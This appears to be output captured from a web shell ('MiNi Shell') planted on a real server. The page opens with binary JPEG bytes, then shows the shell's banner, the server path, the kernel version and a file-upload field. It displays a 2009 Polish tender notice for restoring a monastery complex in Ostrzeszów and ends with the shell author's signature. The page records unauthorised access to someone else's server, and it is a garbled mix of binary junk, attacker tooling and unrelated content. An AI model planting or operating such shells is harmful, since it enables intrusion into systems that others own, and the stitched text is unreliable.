JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090702/104377-N-2009.html

<p class="kh_header"><b>Ostrzeszów: OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ NA REWALORYZACJĘ POBERNARDYŃSKIEGO ZESPOŁU KLASZTORNEGO W OSTRZESZOWIE ORAZ NADZÓR AUTORSKI</b><br>
<b>Numer ogłoszenia: 104377 - 2009; data zamieszczenia: 02.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zgromadzenie Sióstr Najświętszej Rodziny z Nazaretu , ul. Leśna 5, 63-500 Ostrzeszów, woj. wielkopolskie, tel. 0-62 730 23 14, faks 0-62 730 43 76.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: podmiot prawny związku wyznaniowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ NA REWALORYZACJĘ POBERNARDYŃSKIEGO ZESPOŁU KLASZTORNEGO W OSTRZESZOWIE ORAZ NADZÓR AUTORSKI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEDMIOT ZAMÓWIENIA:  Przedmiotem zamówienia jest opracowanie dokumentacji projektowej na rewaloryzację Pobernardyńskiego Zespołu Klasztornego w Ostrzeszowie oraz nadzór  autorski. Szczegółowy opis zamówienia zawarty będzie w Specyfikacji Istotnych Warunków Zamówienia (SIWZ), którą Zamawiający przekaże Wykonawcom  wraz z zaproszeniem do składania ofert. ZAKRES ZAMÓWIENIA : W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany jest do wykonania poniżej wymienionych prac :
1.sporządzenie projektu budowlanego w celu uzyskania pozwolenia na budowę, w tym :
  1.1.projektu architektoniczno - budowlanego wielobranżowego zawierającego :
       - projekt architektoniczny,
       - projekt konstrukcyjny,
       - projekt instalacji wody użytkowej i kanalizacji sanitarnej, 
       - projekt CO (centralnego ogrzewania),
       - projekt wentylacji mechanicznej (jeśli będzie taka potrzeba),
       - projekt instalacji elektrycznych i odgromowych,
       - projekt instalacji teletechnicznych ( wg wskazań zamawiającego),
       - projekt instalacji sygnalizacji ppoż. (wg rozwiązań określonych przez 
         rzeczoznawcę ds. ochrony przeciwpożarowej, przyjętych przez Urząd 
         Konserwatora Zabytków),
       - projekt instalacji antywłamaniowej według zaleceń Urzędu Konserwatora 
         Zabytków,
  1.2. projektu zagospodarowania dziedzińca kościelnego i klasztornego,
        obejmującego:
       - projekt architektoniczny z uwzględnieniem ewentualnych wyburzeń i nowych
         elementów DFA (drobne formy architektoniczne), takich jak: schody 
         zewnętrzne, podnośniki dla osób niepełnosprawnych, mury oporowe, 
         ogrodzenie itp.,
        - projekt sieci kanalizacji deszczowej kompleksu kościelno - klasztornego,
        - projekty przyłączy instalacyjnych (o ile zaistnieje potrzeba),
        - projekt zieleni w zakresie zmian wynikających z planu zagospodarowania 
          terenu,
        - projekt drogowy w zakresie zmian wynikających z planu zagospodarowania 
          terenu,
2. sporządzenie projektów wykonawczych - odpowiednio według branż jak w projektach budowlanych,
3. sporządzenie projektów powykonawczych - odpowiednio według branż jak w projektach budowlanych,
4. sporządzenie przedmiarów robót i kosztorysów inwestorskich,
    Przedmiary robót i kosztorysy należy wykonać z podziałem kosztowym 
    na 2 kategorie:
    A - część kwalifikowalna zgodnie z wytycznymi Departamentu Wdrażania 
         Programu Regionalnego Urzędu Marszałkowskiego w Poznaniu,
    B - część niekwalifikowalna zgodnie z w/w wytycznymi .
5. sporządzenie szczegółowych specyfikacji technicznych wykonania i odbioru robót budowlanych zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej (Dz. U. Nr 202 poz.2072),
6. wystąpienie na rzecz zamawiającego o wydanie wymaganych przepisami prawa decyzji w tym decyzji konserwatorskich i ich uzyskanie, a następnie decyzji o pozwoleniu na budowę i uzyskanie pozwolenia na budowę w zakresie projektowanych prac,
7. sprawowanie nadzoru autorskiego nad realizacją projektu.

Zawartość dokumentacji projektowej musi spełniać kryteria określone w rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r. Nr 202, poz. 2072 z późniejszymi zmianami), uwzględniać uzgodnienia z Wojewódzkim Urzędem Konserwatora Zabytków w Poznaniu Delegatura w Kaliszu oraz być zgodna ze wskazaniami zawartymi w załącznikach do SIWZ i ustaleniami uzgodnionymi z Zamawiającym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 150.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 10.000,00 PLN (słownie: dziesięć tysięcy złotych 00/100). Wadium należy wnieść przed upływem terminu składania ofert. Szczegóły dotyczące wniesienia wadium zostaną przedstawione w Specyfikacji Istotnych Warunków Zamówienia, którą Zamawiający przekaże Wykonawcom zaproszonym do składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> OPIS WARUNKÓW UDZIAŁU W POSTĘPOWANIU :
O udzielenie zamówienia mogą ubiegać się wykonawcy spełniający niżej podane warunki:
1. posiadają uprawnienia niezbędne do wykonania zamówienia jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, w szczególności :
1.1. Posiadają uprawnienia budowlane w zakresie projektowania w specjalnościach :
a) architektonicznej,
b) konstrukcyjno - budowlanej,
c) instalacyjnej w zakresie branży elektrycznej,
d) instalacyjnej w zakresie: woda użytkowa, kanalizacja sanitarna i deszczowa, centralne ogrzewanie,
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia. 
2.1  Posiadają niezbędną wiedzę i doświadczenie  - Wykonawca musi wykazać, że w okresie ostatnich pięciu lat (licząc wstecz od daty wszczęcia postępowania) wykonał należycie minimum 5 projektów przy obiektach zabytkowych, które uzyskały wymagane prawem zgody i decyzje (prawomocne pozwolenie na budowę) lub zostały zrealizowane, w tym  przynajmniej jednego projektu o charakterze i złożoności porównywalnej z przedmiotem zamówienia (zabytkowy obiekt klasztorny  o powierzchni powyżej 1000 m2). 
Jeżeli okres prowadzenia działalności jest krótszy niż 5 lat Wykonawca musi wykazać, iż odpowiednio do lat działalności samodzielnie wykonał średniorocznie przynajmniej jeden projekt przy obiektach zabytkowych, w tym przynajmniej jeden projekt o charakterze i złożoności porównywalnej z przedmiotem zamówienia (zabytkowy obiekt klasztorny  o powierzchni powyżej 1000 m2).
2.2 Dysponują potencjałem technicznym - Wykonawca musi wykazać, iż posiada specjalistyczne oprogramowanie do projektowania, umożliwiające wykonanie przedmiotu zamówienia z uwzględnieniem wymogów co do wersji elektronicznej w układzie wielowarstwowym w programie AutoCad oraz w formacie PDF. 
2.3. Dysponują osobami zdolnymi do wykonania zamówienia - Wykonawca  musi wykazać, iż dysponuje osobami zdolnymi do wykonania zamówienia projektu wielobranżowego w wymienionych w pkt. 1.1. specjalnościach.
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655, z późn. zm.). 
5.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum, spółka cywilna) muszą wykazać, że każdy z Wykonawców oddzielnie posiada uprawnienia niezbędne do wykonania zamówienia oraz  że spełnia warunki określone w punkcie 4.,  natomiast pozostałe warunki spełniają osobno lub łącznie.
   
OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA WYMAGANYCH WARUNKÓW
Oceny spełnienia przez Wykonawcę wymaganych warunków udziału w postępowaniu zamawiający dokona według formuły spełnia/nie spełnia- na podstawie analizy złożonych przez Wykonawcę dokumentów i oświadczeń, o których mowa niżej. Z załączonych do wniosku wykonawcy dokumentów mających na celu potwierdzenie spełnienia przez niego w/w warunków wynikać ma jednoznacznie, iż wykonawca te warunki spełnia. 
Dodatkowo ocena niezbędnej wiedzy i doświadczenia wykonawców zostanie dokonana poprzez przyznanie punktów za ujęte w wykazie i potwierdzone dokumentem o należytym wykonaniu usługi w następujący sposób :    
1. 1 punkt za każdy potwierdzony dokumentem o należytym wykonaniu usługi zrealizowany w ciągu ostatnich 5 lat projekt obiektu zabytkowego, porównywalny powierzchniowo z przedmiotem zamówienia (powierzchnia powyżej 1000 m2),
2. w tym 2 punkty za każdy potwierdzony dokumentem o należytym wykonaniu usługi zrealizowany w ciągu ostatnich 5 lat projekt zabytkowego obiektu sakralnego, porównywalny powierzchniowo z przedmiotem zamówienia (powierzchnia powyżej 1000 m2),
3. w tym 5 punktów za każdy potwierdzony dokumentem o należytym wykonaniu usługi  zrealizowany w ciągu ostatnich 5 lat projekt zabytkowego zespołu klasztornego, porównywalny powierzchniowo z przedmiotem zamówienia (powierzchnia powyżej 1000 m2).
4. Punkty przyznawane wykonawcom w poszczególnych kategoriach podlegać będą sumowaniu.
5. Oceny wniosków dokonywać będą członkowie komisji przetargowej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A) W celu spełniania warunku opisanego w pkt. 1. Wykonawcy winni przedłożyć oryginały lub kserokopie poświadczone przez Wykonawcę za zgodność z oryginałem dokumentów potwierdzających : 
a) uprawnienia do projektowania we właściwej branży,
b) przynależność do właściwego zrzeszenia branżowego,  
oraz złożyć oświadczenie  o spełnianiu warunków określonych w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych

B) W celu spełnienia warunku opisanego w pkt. 2. Wykonawcy winni przedłożyć oryginały lub kserokopie poświadczone przez wykonawcę za zgodność z oryginałem dokumentów potwierdzających: 
a) doświadczenie wykonawcy - referencje od Inwestorów dotyczące posiadanego doświadczenia Wykonawcy pozwalające na identyfikację Inwestorów;
oraz przedstawić wykaz przynajmniej 5 projektów przy obiektach zabytkowych wykonanych w ciągu ostatnich 5 lat w tym przynajmniej jeden projekt o charakterze i złożoności porównywalnej z przedmiotem zamówienia (zabytkowy obiekt klasztorny  o powierzchni powyżej 1.000 m2). Jeżeli okres prowadzenia działalności jest krótszy niż 5 lat Wykonawca musi przedstawić wykaz, iż odpowiednio do lat działalności samodzielnie wykonał średniorocznie przynajmniej jeden projekt przy obiektach zabytkowych, w tym przynajmniej jeden projekt o charakterze i złożoności porównywalnej z przedmiotem zamówienia (zabytkowy obiekt klasztorny  o powierzchni powyżej 1.000 m2).
Wykazy powinny być sporządzone z podaniem daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że projekty ujęte w wykazie zostały należycie wykonane.  
b)  uprawnienia  osób zdolnych do wykonania zamówienia oraz ich członkowstwo w zrzeszeniu branżowym;
oraz złożyć wykaz osób zdolnych do wykonania zamówienia
c) legalność posiadanego specjalistycznego oprogramowania do projektowania - licencja, lub/i certyfikat legalności, umożliwiającego wykonanie zamówienia zgodnie z wymaganiami określonymi w dokumentacji przetargowej,

C) W celu spełnienia warunku opisanego w pkt. 3. Wykonawcy winni przedłożyć oryginały lub kserokopie poświadczone przez wykonawcę za zgodność z oryginałem polisy ubezpieczeniowej OC z tytułu prowadzonej działalności na kwotę min. 50.000,00 Euro (pięćdziesiąt tysięcy Euro). 

D) W celu spełnienia warunku określonego w pkt. 4. Wykonawcy winni przedłożyć oryginały lub kserokopie poświadczone przez wykonawcę za zgodność z oryginałem podanych poniżej dokumentów  : 
a) aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosku, 
b) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
c) aktualnej informacji z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
d)  aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
oraz złożyć oświadczenie o spełnianiu warunków określonych w art. 24 ust. 1 pkt 1-9 Ustawy Prawo Zamówień Publicznych. 
E) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
 a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
 b)  nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
 c)  nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Dokumenty, o których mowa w pkt. a  i c  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia 
Dokument, o którym mowa w pkt. b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia .
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - do terminów wystawienia wyżej wymienionych dokumentów stosuje się zapisy powyższe.
F) Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 40</li>
<li>2 - termin wykonania - 40</li>
<li>3 - dodatkowe zabezpieczenie - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> nie dotyczy.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zgromadzenie Sióstr Najświętszej Rodziny z Nazaretu
ul. Leśna 5, 63-500 Ostrzeszów
e-mail: nazaretankiostrzeszow@gmail.com
Godziny urzędowania: od 8:00 do 16:00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2009 godzina 09:45, miejsce: Zgromadzenie Sióstr Najświętszej Rodziny z Nazaretu
ul. Leśna 5, 63-500 Ostrzeszów
Biuro Projektu (dom Matki Bożej).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com